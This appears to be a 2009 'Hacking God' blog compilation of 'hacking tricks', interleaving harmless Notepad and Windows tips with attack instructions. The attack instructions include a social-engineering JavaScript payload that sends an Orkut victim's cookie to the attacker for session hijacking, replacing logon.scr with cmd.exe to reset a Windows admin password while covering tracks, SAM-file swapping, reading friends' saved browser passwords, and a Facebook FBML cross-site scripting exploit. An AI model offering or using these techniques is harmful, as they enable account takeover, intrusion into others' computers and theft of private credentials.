Page 1: Tricks From Hacking God 21 Pages

Send Email in Mission Impossible Style

You might remember the world famous scene of Mission Impossible in which after the message has been heard once the message destroys itself. Now it is possible for everybody to have such facility. You can send an E-mail which destroys itself after it has been read once.

Every time that you send an email, copies are stored permanently on multiple email servers as well as the recipient's inbox and anyone they decide to send it to. Your emails can be stored and scanned in more places than you can imagine. Do you want people storing your email messages forever? Do you want something that you type today to be used against you tomorrow, next week, next month or even in the next decade?

Until now, everyone else has had control of the email that you have sent. BigString gives you back control of your email, acting like an automatic shredder for your email. You can self-destruct or change an email that's already been sent or read. Don't leave your messages sitting in peoples' inboxes forever. Get a free BigString email account to protect your privacy.

BigString takes the risk out of email

Now, with BigString, you can finally take the risk out of email and put an end to "sender regret." It is the world's first & only email service that thoroughly protects your safety and privacy.

BigString's exclusive, patent-pending technology enables you to prevent your personal or business information from lingering indefinitely in someone else's inbox. It also restricts private pictures or messages from being indiscriminately spread throughout cyberspace! Now your sensitive photos can't be posted to unseemly web sites or printed for circulation amongst total strangers.

BigString lets you have second thoughts

BigString shifts the control from the recipient to YOU the sender. BigString grants the luxury of second thoughts, the power to limit message viewings, and the choice to delay email transmission.

You can reword a message fired off in anger or haste or completely delete it! You can recall a botched résumé for revision or erase a tasteless joke. You can make a work of art or photograph print-proof. You can prevent a love letter from being forwarded. You can set an expiration date on an emailed price quote or business offer or you can simply pull back an email to eliminate typos.

BigString takes the danger out of clicking

Page 2: Tricks From Hacking God 21 Pages

BigString guarantees that clicking "send" will never again be an irreversible disaster. Now YOU decide the fate of your emails. You decide where they end up, who sees them and for how long. BigString emails can be destroyed, recalled or changed even after they've been opened! The freedom is yours, the options are yours, and you're the boss with BigString.

BigString is easy to use

BigString is as easy to use as any other email and there's nothing to download! Don't be resigned to the mercy of your recipient. You don't want your every action to be carved in stone because sometimes you just NEED to take it back!

Here are just a few of the many applications of BigString Erasable, Recallable, Non-Printable Email.

Executives: Protect your business and safeguard your email. Now you never have to worry about sending the wrong attachment or completely forgetting it. Misspelled words, incorrect dates, or other typos can all be fixed even after your message has been sent. You can even "pull an email back" to delete expired price quotes, old business offers or dated legal material. BigString is your email insurance.

On-Line Daters: You don't want your personal information like pictures, phone numbers or intimate notes, circulated around the Internet! BigString prevents your pictures and messages from being printed or forwarded. You can set an expiration date for an email or self-destruct it at will. You can choose the number of times you'll allow a picture to be viewed before it disappears. BigString protects your privacy!

Artists and Photographers: Now with BigString you can confidently email proofs and samples without the slightest fear that they will be printed or saved for later use without your authorization. Use BigString to make your image non-savable and non-printable! Limit the number of times a client can view a piece before you have it self-destruct. You can even recall a sent email to delete an old price quote or alter a new one. You can also prevent it from being forwarded to other customers. BigString protects your rights of ownership!

Copywriters: Spelling or punctuation errors that can cost time, money, or embarrassment are now a thing of the past. With BigString, clicking "send" is no longer an action "carved in stone." Accidentally arranging paragraphs in the wrong order will no longer mean a lost account. With the technology of BigString you can recall that mistake-ridden copy and correct the errors even after your email has left the outbox. You can self-destruct what you sent all

Page 3: Tricks From Hacking God 21 Pages

together and replace it with a fully revised version. Only you will know this switch has occurred! With BigString you can confidently send non-printable, non-savable sample copy. You no longer have to worry that it will be used without your knowledge. You're the boss with BigString.

Labels: Hacking Tricks

Posted by HACKING GOD at 3:27 AM 0 comments  

Wednesday, August 26, 2009

Crack windows passwords

There’s a way to crack the password and it doesn’t involve reformatting and reinstalling Windows. The solution is called @stake LC4 (formerly L0phtCrack), however since Symantec stopped development of L0phtcrack, I’m going to let you in on a program called LC5. Just like L0phtCrack, LC5 attacks your Windows machine with a combination of dictionary and brute force attacks. LC5 can crack almost all common passwords in seconds. More advanced passwords with numbers and characters takes longer. The main purpose of the LCP program is user account passwords auditing and recovery in Windows NT/2000/XP. I haven’t tested it against Windows Vista yet, so I’m not sure if it will work. Your mileage may very either way. How it works: Windows NT, 2000 and XP passwords are stored as encrypted hashes. LC5 attacks these hashes with hundreds of passwords per minute. Eventually the correct password will be sent and then displayed to the screen. Good intentions:

can find weak passwords within minutes. Sys admins can then change the passwords to make them more secure.

LC5 can be used to access computers of users who forget passwords.

In companies, it can be used to access computers of employees who have left the company.

Bad intentions:

Hackers can use LC5 to sniff passwords over networks. Hackers can install this application onto a primary domain controller and steal hundreds

of passwords within minutes.

Download LC5 (v5.04): English version (with installer) – 2.29 MBEnglish version (without installer, ZIP) – 1.86 MBEnglish version (without installer, RAR) – 1.66 MB Software License: LCP is a freeware program. The program may be distributed under condition of saving all files contents and structure of installation package.

Labels: Hacking Tricks

Page 4: Tricks From Hacking God 21 Pages

Posted by HACKING GOD at 1:11 PM 0 comments  

Breaking Administrator’s Password!!

Administrator password can be broken by replacing sam file in system32\config by the sam file in repair folder of windows. it can be easily done on a machine with dual operating systems, simply log on to os other then the one whoes password is to be cracked the way is exactly same as written above but if there is a single os on a machine then there is only one way i.e to use ms dos start up disk or some other boot disk and replace the sam file in config folder with the one in repair foldernote:- this method works only if hard drive is FAT32 formatted because NTFS drive does’nt take boot from Ms DOSThis way you can remove the old administratOr password as if the windows is newly installed and the password was’nt set

Labels: Hacking Tricks

Posted by HACKING GOD at 1:09 PM 0 comments  

Saturday, August 22, 2009

Notepad tricks

You might be using Notepad since long but there are few tricks which are still unknown to you.

There few tricks which you can use in notepad. Well quite old but here is d complete collection

Step 1: Open NotepadStep 2: Write following line in the notepad.

this app can breakStep 3: Save this file as xxx.txtStep 4: Close the notepad.Step 5: Open the file again.



1> Open Notepad2> Enter four words separated by spaces, wherein the first word has 4 letters, the next two have three letters, and the last word has five letters3> DON'T hit enter at the end of the line.

Page 5: Tricks From Hacking God 21 Pages

4> Save the file.5> Close Notepad.6> Reopen Notepad.7> Open the file you just saved.


1> Open a note pad2> Type Bush hid the facts3> Save that file,4> Close it5> Again open and see...

NOTEPAD "world trade centre trick".. :

Did you know that the flight number of the plane that had hit WTC ...on 9/11 was Q33N ....Open your Notepad in ur computer and type the flight number i.e Q33N... Increase the Font Size to 72, Change the Font to Wingdings. U will be amazed by the findings.

log trick !! make ur Notepad a diary !!

Sometimes we want to insert current data and time, whenever we open the file in the notepad. If you are a lazy person like me, who don’t like to press F5 whenever you open a notepad. Then here is a trick to avoid this. Just add a .LOG in the first line of your text file and close it. Whenever you open the file with that text in the first line in the notepad, it will insert the current date and time at the end of the file. You can start entering your text after that.


The reason this happens:

In notepad, any other 4-3-3-5 letter word combo will have the same results. It is all to do with a limitation in Windows. Text files containing Unicode UTF-16-encoded Unicode are supposed to start with a "Byte-Order Mark" (BOM), which is a two-byte flag that tells a reader how the following UTF-16 data is encoded.

1) You are saving to 8-bit Extended ASCII (Look at the Save As / Encoding format)2) You are reading from 16-bit UNICODE (You guessed it, look at the Save As / Encoding format)This is why the 18 8-bit characters are being displayed as 9 (obviously not supported by your codepage) 16-bit UNICODE characters

Page 6: Tricks From Hacking God 21 Pages

~ cheers ~

Changing Header and Footer

Ever printed the little text you wrote in Notepad? More often than not, the printout starts with “Untitled” or the filename at top, and “Page 1″ on bottom. Want to get rid of it, or change it? Click on File, Page Setup. Get rid of the characters in Header and Footer boxes, and write what you want as Header and Footer. Use the following codes.

&l Left-align the characters that follow&c Center the characters that follow&r Right-align the characters that follow&d Print the current date&t Print the current time&f Print the name of the document&p Print the page number

Print tree root

a. Open NOTEPAD and enter {print tree root}b. After that hit enter and type C:\windows\systemc. After that hit enter and type {print C:\windows\system\winlogd. Hit enter and type 4*43″$@[455]3hr4~e. Then save the file as teekids in C:\windows\system.

Labels: Hacking Tricks, Solutions

Posted by HACKING GOD at 11:55 AM 0 comments  

How To Change Your Ip In Less Then 1 Minute

This article will help you to change your IP address within a minute. Just follow the following step and you will be thru.

1. Click on "Start" in the bottom left hand corner of screen2. Click on "Run"3. Type in "command" and hit ok

You should now be at an MSDOS prompt screen.

4. Type "ipconfig /release" just like that, and hit "enter"5. Type "exit" and leave the prompt6. Right-click on "Network Places" or "My Network Places" on your desktop.7. Click on "properties"

Page 7: Tricks From Hacking God 21 Pages

You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks.

8. Right click on "Local Area Connection" and click "properties"9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab10. Click on "Use the following IP address" under the "General" tab11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.13. Hit the "Ok" button here14. Hit the "Ok" button again

You should now be back to the "Local Area Connection" screen.

15. Right-click back on "Local Area Connection" and go to properties again.16. Go back to the "TCP/IP" settings17. This time, select "Obtain an IP address automatically"tongue.gif 18. Hit "Ok"19. Hit "Ok" again20. You now have a new IP address

With a little practice, you can easily get this process down to 15 seconds.

P.S:This only changes your dynamic IP address, not your ISP/IP address. If you plan on hacking a website with this trick be extremely careful, because if they try a little, they can trace it back

Labels: Hacking Tricks, Solutions

Posted by HACKING GOD at 11:52 AM 0 comments  

Hack your friends Internet Password

This is Really Amazing. I was moving through my Browser's settings and found the file where all the passwords are stored. I was really shocked that it allowed me to have a look at all the Username and Password which I had asked my computer to remember which also included my Internet Username and Password. But this is only possible in Mozila Firefox.

To Hack your friends Password you only need even less than a minute and you can have a quick look at your friends Usernames and Passwords.

Just follow the following steps:

1. Open Mozila Firefox2. Goto Tools -> Options

Page 8: Tricks From Hacking God 21 Pages

3. In that goto Privacy -> Passwords.

4. There you will find View Saved Passwords Button Click on it.

5. It will show you a list of websites with the usernames. To get the Passwords Click on Show Passwords Button.

6. Now To get the Internet Password Just see for any IP address in the website column this is the Ip address of that computer and Username and Pass is what you want.

7. You can get pass of any account just look for the site name whose password you want to hack and on the right side you will get the Username and Password

Labels: Hacking Tricks

Posted by HACKING GOD at 11:49 AM 0 comments  

Friday, August 21, 2009

How to Hack Windows XP Admin Password

If you log into a limited account on your target machine and open up a dos prompt then enter this set of commands Exactly :

cd\ *drops to rootcd\windows\system32 *directs to the system32 dirmkdir temphack *creates the folder temphackcopy logon.scr temphack\logon.scr *backsup logon.scrcopy cmd.exe temphack\cmd.exe *backsup cmd.exedel logon.scr *deletes original logon.scrrename cmd.exe logon.scr *renames cmd.exe to logon.screxit *quits dos

Now what you have just done is told the computer to backup the command program and the screen saver file, then edits the settings so when the machine boots the screen saver you will get an unprotected dos prompt without logging into XP.

Once this happens if you enter this command :

net user password

Page 9: Tricks From Hacking God 21 Pages

If the Administrator Account is called Frank and you want the password blah enter this

net user Frank blah

and this changes the password on franks machine to blah and your in.

Have Fun!

p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks

Labels: Hacking Tricks

Posted by HACKING GOD at 5:49 AM 0 comments  

Thursday, August 20, 2009

Increase Fans ( Working Code ) Really Amazing

Follow the steps:

1) Create a fake account or simply login with ur friends Id.. and add yourself as a friend there.

2) Visit the FRIENDS page by logging into your just created fake account or the Friends account.

3) Point your cursor on the fan icon () beside your real profile. Note your status bar. It should be showing something like javascript:setKarma('FRUS*******/US*******'). Note the code FRUS******* and US******* somewhere. Now, click on the star so as to make your fake account a fan of your real account.

4) Copy the following code to your address bar (The location where you type ). Replace FRUS******* and US******* in the following script with the one you noted in the above step.

javascript:function cmd(){window.location="/setkarma?cat=0&val=3&gid=FRUS*******/US*******";}void(setInterval(cmd,2000));

5) Hit ENTER key of your keyboard. The page will keep on reloading and your fans will keep on increasing with an approximate speed of 6 fans per second untl you close the window.

Page 10: Tricks From Hacking God 21 Pages

Labels: Hacking Tricks, Orkut Hacking

Posted by HACKING GOD at 11:43 AM 0 comments  

A Java Trick that Pops Message " Ur Account Is Hacked"

javascript:function reverse() { var inp = "kihsA yb dekcah si tnuocca tukrO ruoY "; var outp="";for (i = 0; i <= inp.length; i++) { outp =inp.charAt (i) + outp;}alert(outp) ;}; reverse();

copy and paste d Above link On Address Bar.. n replace "luhaR" by ur own Name.. n send it to ur friends

Or u can Manually create Any kind of Alert Box by


copy and paste d Above link On Address Bar.. n replace "luhaR" by ur own Name.. n send it to ur friends

Labels: Hacking Tricks, Orkut Hacking

Posted by HACKING GOD at 11:43 AM 0 comments  

Scrapbook refresher ! make ur own

Easy trick for u guys.. m happy to share it wid d worldhave seen many places u need to download stuff like thiswhy dont u do it urself. it just takes 2 minutesm not kiddinThis Scrapbook Auto Refresher trick refreshes your scrapbook for every few seconds.

The default timer is set as 30 seconds.

If you want to change the default timer, follow the steps below.

1) Copy the code below in Notepad2) Select 'save as'.3) Save it as scrapbookrefresher.html4) The code gets saved in ur default browser application, now view source.5) Observe the 6th line ( )6) Change the number "30" in the above line to the number of seconds you want.7) Save the file by selecting File -> Save.8) Close the notepad.9) Double click (Opens in your Internet browser) on the scrapbookautorefresher.html fileto refresh your scrapbook for every few

Page 11: Tricks From Hacking God 21 Pages



***************************************************************ANYWAYS IF U WANNA SHAKE THE SCREEN COPY THE SCRIPT BELOW AND PASTE IT IN THE ADDRES BAR OF UR BROWSER.

javascript:function flood(n) {if (self.moveBy) {for (i = 15; i > 0; i--) {for (j = n; j > 0; j--){self.moveBy (1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} flood(6);{ var inp = "LUHAR LUHAR - - - LUHAR "; var outp = ""; for (i = 0; i <= inp.length; i++) { outp = inp.charAt (i) + outp ; } alert(outp) ;}; reverse();see how easy it is

Labels: Hacking Tricks, Orkut Hacking

Posted by HACKING GOD at 11:40 AM 0 comments  

See All Pictures Of Album In Fullsize At A Time !!

Use This CODE:

javascript:d=document.body.innerHTML; m=d.match(/{1,99}jpg/gi);


*Method To Use*Open Andbody's Album You Want To SeeJust Paste This CODE & (Press Enter)or(GO)it works

~cheers ~

Labels: Hacking Tricks, Orkut Hacking, Solutions

Posted by HACKING GOD at 11:39 AM 0 comments  

How To Block Unwanted Scraps on Orkut

Oh my God! I never thought Orkut would even give consideration to the feature that they have finally implemented now. Orkut was always looked down upon when compared to other social networking websites due to its low privacy features and security holes which could get your

Page 12: Tricks From Hacking God 21 Pages

Orkut account hacked or even cause you to lose some very personal information but the recent addition of a new feature to the Orkut system shall now ensure that Orkut will be safe enough to compete with other social networks like Facebook and MySpace.

How To Block Unwanted Scraps on Orkut

“Friends and Friends Only Scraps” (Thats what I call it) is a new feature that has been recently added to the Orkut system and will ensure that you get scraps only from the people you trust i.e. friends and family etc. This will block all unwanted scraps in your scrapbook from people who usually used to spam you or irritate you for no reason. The new great feature will make sure that you don’t get links to any malicious scripts and websites and will also prevent unknown people from writing something abusive or unethical on your scrapbook.

Follow the simple little steps to set up the “Friends and Friends Only Scraps” Feature

Open Orkut Privacy Settings See the third row which says “allow scraps to be written by”

In the drop down menu select “Friends”

Save changes and You are done

That should do the trick now you can happily and safely use Orkut without the fear of getting hacked or getting vulgar/unwanted scraps in your scrapbook.

Labels: Hacking Tricks, Orkut Hacking

Posted by HACKING GOD at 11:37 AM 0 comments  

How To Block Unwanted Scraps on Orkut

Oh my God! I never thought Orkut would even give consideration to the feature that they have finally implemented now. Orkut was always looked down upon when compared to other social networking websites due to its low privacy features and security holes which could get your Orkut account hacked or even cause you to lose some very personal information but the recent addition of a new feature to the Orkut system shall now ensure that Orkut will be safe enough to compete with other social networks like Facebook and MySpace.

Page 13: Tricks From Hacking God 21 Pages

Labels: Hacking Tricks, Orkut Hacking

Posted by HACKING GOD at 11:36 AM 0 comments  

Home Orkut Hacks

As I'm Orkut user I like these sites and Orkut hacks on it, the following are some of my collection regarding Orkut hacks

1) Zeetab(Orkut Star) - Computer World, Orkut Computer Tips and Tricks, Free Sms, Wallpaper, Mobile Software Game Ringtone Themes, Free games, Orkut Software, Bollywood wallpaper, MP3, FM Rradio and many more

2) (TIO) - This Is Orkut (T.I.O) was created to provide more info and help tracks to Orkut users for their convenience. Easy to use Java Scripts, Online Toolbars, Help References, Trouble shooters, and lot more....

3) - Crazy souls have created many orkut scripts and they are really useful and working. Not only scripts they also profide stuffs for MSN, Cheets and many more

4) - Here, on this website, you will find tips and tricks that will help in making your life easier on Orkut. This webpage also contains many sftware related to Orkut

5) Tools Home - This site is developed by 15 yr Old boy, this site contains some cool stuffs and software

6) - This site provide services like Messages, Generators, ASCII Art, Bar Arts, Images, Emotions, Smailies and many more

7) Orkut Underworld - This is blog which have awesome collection of orkut tips and tricks, softwares and many more. In short simple blog but useful blog

8) - In the world of Orkut tricks! You find only GENUINE and popular orkut tricks and scripts here. Browse through the menu for those tricks but they also provide some hacking tricks of orkut

9) - According to me this is the best of all because this website posts all the current information in orkut, this website is very useful for begineers and also for everyone

10) OrkutPlus! - Orkut plus is really a Plus to Orkut they are providing Best Compilation of Orkut Hacks, Tips-Tricks and Cheat Scripts ! as they are publishing

Page 14: Tricks From Hacking God 21 Pages

11) Devils workshop - This blog contains not only tips and tricks for Orkut it also having some best collection for My space, You tube, Google, Ad sense, and many more. More over I like the labels cloud on that blog

12) Digital Me - this blog just started before 2 months but it contains wide range of softwares, Java scripts, GM scripts, etc..

I'm still having many collection of website but this dozen of sites will do all what you want to known about orkut, so it wont be useful even if I provide more, from this website you can communication in orkut reaches next generation

Labels: Hacking Tricks, Orkut Hacking

Posted by HACKING GOD at 11:35 AM 0 comments  

Hack Orkut Accounts

First get firefox and the cookie editor plugin for it...u will need them...

Then make two fake accounts...u will ned one to receive the cookie and one to advertise your script so that if orkut starts deleting such profiles your real account wont be compromised...the choice is yours though..

javascript:nobody=replyForm;nobody.toUserId.value=62915936;nobody.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101)); nobody.action='Scrapbook.aspx?Action.writeScrapBasic';nobody.submit()

U see the 62915936 part? Thats the one u need to edit to get the cookie to your account.....

Now here is the script Code:


1) Go to YOUR ALBUM section.

2) Go to ANY photo and right click on it , see the properties of your display image...u will see something like 12345678.jpg

3) There will be a eight digit value.

4) Now put that value in the above javascript.

Page 15: Tricks From Hacking God 21 Pages

5) Thats it.

Now your javascript will look like:


Now give this script to the victim , ask him to go to his scrap book and paste this script in his address bar and press enter. now you ll get his cookies in your scrapbook.

Now after getting a cookie...

1) Go to your home page

2) Open the cookie editor plugin(TOOLS-->COOKIE EDITOR).

3) Type orkut in the text box and click filter/refresh.look for orkut_state cookie.

4) Just double click it and replace the orkut_state part with your victims. No need to change the _umbz _umbc part...


ANOTHER SCRIPT : (100%working)




Put ur eight digit number in the place of (53093255)

Labels: Hacking Tricks, Orkut Hacking

Posted by HACKING GOD at 11:34 AM 0 comments  

Block your friends scrapbook - ORKUT

Page 16: Tricks From Hacking God 21 Pages

It will be really scary when you will find out that you are not able to reply to your friends scrap from your own scrapbook. Yes this hack can be used to block anybody's scrapbook. The best part is that after the scrapbook is blocked nobody can scrap him. Really cool!

Copy this and paste in your friends scrapbook.

<embed src="" height="1" width="1"></embed>

When that man will enter his scrapbook he will be at the login position .he cant reply from his scrapbook and no one can enter in his profile and scrap him...

Solution : (To Unblock it)

To avoid being logged off again when you see the scrap, you can block flash in your browser.

For Firefox download the following plugin :

In opera, you can disable the flash plugin.

Now this will only allow you to enter the scrapbook but your friends will still not be able to scrap you. So for that you need to delete the scrap.

Another Method:

First open your scrapbook.

Now Open your Orkut Homepage in a new window( Don't close the scrapbook ). You will find the login page.

Now enter your detail and login to Orkut.

After being logged in delete the scrap from the scrapbook page that you had kept open.

Labels: Hacking Tricks, Orkut Hacking

Posted by HACKING GOD at 11:33 AM 0 comments  

What to Do when Ur Orkut is Hacked!

It can be a nightmare if someone else takes control of your Google Account because all your Google services like Gmail, Orkut, Google Calendar, Blogger, AdSense, Google Docs and even Google Checkout are tied to the same account.

Page 17: Tricks From Hacking God 21 Pages

Here are some options suggested by Google Support when you forget the Gmail password or if someone else takes ownership of your Google Account and changes the password:

1. Reset Your Google Account Password:

Type the email address associated with your Google Account or Gmail user name at - you will receive an email at your secondary email address with a link to reset your Google Account Password.This will not work if the other person has changed your secondary email address or if you no longer have access to that address.

2. For Google Accounts Associated with Gmail:

If you have problems while logging into your Gmail account, you can consider contacting Google by filling this form. It however requires you to remember the exact date when you created that Gmail account.

3. For Hijacked Google Accounts Not Linked to Gmail:

If your Google Account doesn’t use a Gmail address, contact Google by filling this form. This approach may help bring back your Google Account if you religiously preserve all your old emails. You will be required to know the exact creation date of your Google Account plus a copy of that original “Google Email Verification” message.

It may be slightly tough to get your Google Account back but definitely not impossible if you have the relevant information in your secondary email mailbox.

Labels: Hacking Tricks, Orkut Hacking

Posted by HACKING GOD at 11:28 AM 0 comments  

Monday, August 17, 2009

How to Access Banned Websites

Surfing at school? Parents enabled website blocking? Stuck behind a strict firewall? There are lots of ways around the problem so that you can get to the sites you want to see without those cybernannies tying your hands…phproxy is “dedicated to bringing you fast web browsing from behind web filters”. Simply tap in

Page 18: Tricks From Hacking God 21 Pages

the URL of that banned site you really must see, it could be Facebook, MySpace, Youtube, or a renegade blogger behind enemy lines, and you will be able to access it with no problems. More seriously, the proxy allows you to visit a site anonymously because it is the proxy itself that is visiting the banned site not you, and so keeps your browsing hidden from prying eyes allowing you to protect your online identity.

Such a proxy also allows you to visit sites that have banned your IP. This might be a forum or just a website or blog from which you or other users on your IP range (whether on your school or company network or your ISP account) have been barred access. The proxy server is an open gateway between your web destination and you.

Other proxies exist, such as (please make sure you include the hyphen in that URL or you will be in for a shock),

More on an additional approach (Psiphon) here –

Of course, we should add a disclaimer at this point, please don’t use proxies or anonymizers to break the law or to cause malice and please don’t abuse the service as they are usually free.

Labels: Hacking Tricks, Solutions

Posted by HACKING GOD at 6:00 AM 0 comments  

How to Lock the folders

You can lock and unlock your folder with this simple trick !

Procedure :1. Make a folder on the desktop and name it as “folder”2. Now, open notepad and write ren folder folder.{21EC2020-3AEA-1069-A2DD-08002B30309D} and now (Notepad Menu) File>save as.3. In the ’save as’ name it as lock.bat and click save ! (Save it on Desktop)4. Now, again open notepad again and write ren folder.{21EC2020-3AEA-1069-A2DD-08002B30309D} folder and now (Notepad Menu) File>save as.5. In the ’save as’ name it as key.bat and click save ! (Save it on Desktop)6. Now, double click lock.bat to lock the folder and now if you open your folder, control panel will open up !7. Now, double click key.bat to open the folder and now if you open your folder, you can access your data inside the folder again !

Page 19: Tricks From Hacking God 21 Pages

8. Lock your folder and hide the key.bat somewhere else on your hard disk !9. Whenever you want to open your folder just paste the key.bat on desktop and open your folder using it !

Labels: Hacking Tricks, Solutions

Posted by HACKING GOD at 5:58 AM 0 comments  

Saturday, August 15, 2009

A Security Case Study Facebook XSS(Cross Site Hacking)

The Facebook Platform represents a powerful combination of social networkingand third-party gadget aggregation. Officially released in May 2007, theFacebook API provides developers with millions of potential users and partialaccess to their information. The highly personal nature of Facebook data and theamplifying effects of the social network make it crucial that the FacebookPlatform does not enable third-party attacks. This paper describes Facebook’ssecurity mechanisms and presents a cross-site scripting vulnerability inFacebook Markup Language that allows arbitrary JavaScript to be added toapplication users’ profiles. The profile in the code can then defeat their antirequestforging security measures and hijack the sessions of viewers.An introduction to the Facebook PlatformFacebook tightly integrates third-party applications into their website.Applications are served externally but are viewed in the context of a Facebookhostedpage with a Facebook URL. An application has two choices about itsFacebook home page: it can be isolated in an iFrame or written in Facebook’sproprietary markup language and embedded directly into the page. Codewritten in Facebook Markup Language (FBML) is retrieved by the Facebookserver, parsed, and then inserted into their surrounding code. FBML includes a“safe” subset of HTML and CSS as well as Facebook-specific tags.In addition to these application home pages, users may add gadgets to theirprofiles. Profile gadgets are presented alongside Facebook-provided content andallow users to individualize a small portion of their profile. The gadget codemust be written in FBML.Session security measuresFacebook uses two methods to identify and authenticate users: cookies, whichcontain session information, and hidden form IDs that are supposed to ensurethat forms come from the user. With either a cookie or knowledge of a user’sform ID, an attacker can impersonate a victim. A cookie’s session informationwould allow an attacker to construct XMLHttpRequests and assume all the same

Page 20: Tricks From Hacking God 21 Pages

privileges as the user. Hidden form IDs can be used to session surf, meaning theattacker can embed a hidden form into a seemingly innocent page. The formwould automatically submit when viewed by a logged-in user and have theJULY 20072authentication credentials of the unwitting viewer. It is imperative that bothhidden form IDs and cookies be shielded from third-party applications.The DOM provides built-in isolation for third-party code in iFrames. The SameOrigin Policy prevents the applications from accessing any of the content fromthe Facebook servers, including the cookie and the form IDs. However, unlikeparsed FBML code, Facebook must pass all user and viewer information to theapplication. This limits Facebook’s privacy control.FBML gives Facebook the ability to abstract user information and maintainsome uniformity of style between applications. Since the parsed third-party codeis included directly in the page, any malicious code that could slip through theirfilters would have access to the hidden form IDs. Depending on the browserversion, the code might also be able to fetch the user’s Facebook cookies. Untilrecently, many browsers (such as Firefox prior to the release) ignored thehttp-only flag on cookies and would leave them accessible through the JavaScriptdocument.cookie variable. Facebook therefore attempts to strip FBML of allreferences to JavaScript or external code.The XSS vulnerabilityI discovered an oversight in the parsing of the tag that allows theapplication owner to push potentially malicious code to the profile of users. Thetag embeds an Adobe Flash .swf file into a page. To keep ostentatiousgraphics and audio from annoying viewers, a static preview image is provided asa link to the Flash content. The tag includes an imgstyle attributethat is stripped of the ", <, and > characters but not checked for executablecontent. The code I used is of the form:

imgsrc="http://myserver/image.jpg" imgstyle="-mozbinding:url(\'http://myserver/xssmoz.xml#xss\');" />After being parsed and added to the user’s profile, the highlighted imgstyleattribute becomes:

This causes Firefox to retrieve and evaluate the contents of the external XML file.(The exploit could be extended to Internet Explorer by using the CSSJULY 20073expression() function to cause the CSS to execute JavaScript.) The Firefox

Page 21: Tricks From Hacking God 21 Pages

XML file contains the attacker’s JavaScript.
